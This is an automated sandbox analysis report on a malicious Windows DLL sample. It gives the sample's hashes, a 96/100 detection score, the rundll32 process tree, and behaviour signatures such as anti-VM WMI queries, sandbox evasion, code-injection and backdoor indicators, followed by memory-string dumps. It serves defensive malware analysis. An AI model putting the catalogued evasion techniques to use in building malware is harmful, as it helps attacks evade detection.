Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8N8j6QojHn.dll

Overview

General Information

Sample name:8N8j6QojHn.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f.dll.exe
Analysis ID:1578327
MD5:78b199f0a4f453fc8a4a05d05695e91e
SHA1:6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f
SHA256:7f675bb692afe3b8f6dcb4bd533de73e871f167e884c98a04453ec16da0e59dd
Tags:dllexeuser-NDA0E
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Queries BIOS fan information (via WMI, Win32_Fan, often done to detect virtual machines)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Queries voltage information (via WMI often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6840 cmdline: loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 644 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2732 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5860 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 4900 cmdline: C:\Windows\system32\WerFault.exe -u -p 5860 -s 428 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 2912 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5916 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6728 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 4208 cmdline: C:\Windows\system32\WerFault.exe -u -p 6728 -s 428 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 5328 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: rundll32.exe PID: 5328JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: 8N8j6QojHn.dllReversingLabs: Detection: 55%
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49933 version: TLS 1.2
    Source: 8N8j6QojHn.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: sspicli.pdbecurityToolsz source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"Z source: rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mswsock.pdbDSut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: win32u.pdbexeName8# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdb source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dll
    Source: Binary string: tdll.pdb"},{"type":"a source: rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksize source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdbternetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ile":"kernelbase.pdbL source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbor source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wbemprox.pdbr.exessName source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: cryptbase.pdburityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEeInfo[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: shcore.pdbedrSizenfo0cf source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: K7RTScan.exeadvapi32.pdb$M4 source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdbrnetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbor source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"R source: rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: "secur32.pdb"},{"type":"symbolic","name":"C:\\Windows\\SYSTEM32\\CRYPTBASE.DLL","arch":null,"image_addr":"0x7ffd source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdb/SecurityToolsd source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdbols source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: nsi.pdb2% source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"x source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: psapi.pdbexe[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: shcore.pdbedrSizenfo0cf source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: user32.pdbSecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msctf.pdb/SecurityToolsy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbute source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ISATRAY.exews2_32.pdb"}, source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
